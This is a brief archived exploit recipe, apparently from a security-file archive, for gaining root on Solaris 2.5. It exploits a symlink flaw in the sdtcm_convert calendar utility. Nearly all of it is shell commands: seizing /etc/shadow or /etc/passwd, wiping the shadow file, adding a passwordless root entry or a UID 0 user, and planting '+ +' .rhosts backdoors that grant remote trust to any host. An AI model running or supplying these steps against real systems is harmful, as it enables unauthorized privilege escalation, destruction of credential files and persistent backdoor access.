solaris 2.5 calendar root exploit.
% ln -s /etc/shadow /tmp/calorig.<username>
% /usr/dt/bin/sdtcm_convert -d /tmp -v 3 <username>
% ls -l /etc/shadow
% chmod 644 /etc/shadow
% cp /dev/null /etc/shadow
% ls -l /etc/shadow
% echo "root::6445::::::" >> /etc/shadow
% su
or....if /etc/shadow doesnt exist...
% ln -s /etc/passwd /tmp/calorig.<username>
% /usr/dt/bin/sdtcm_convert -d /tmp -v 3 <username>
% ls -l /etc/passwd
% chmod 644 /etc/passwd
% ls -l /etc/shadow
% echo "friday::0:0:mr.friday:/:/bin/bash" >> /etc/passwd
% telnet localhost 23
% cd
% echo "+ +" >> /usr/bin/.rhosts
% echo "+ +" >> .rhosts
<finger users and set up .rhosts>
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
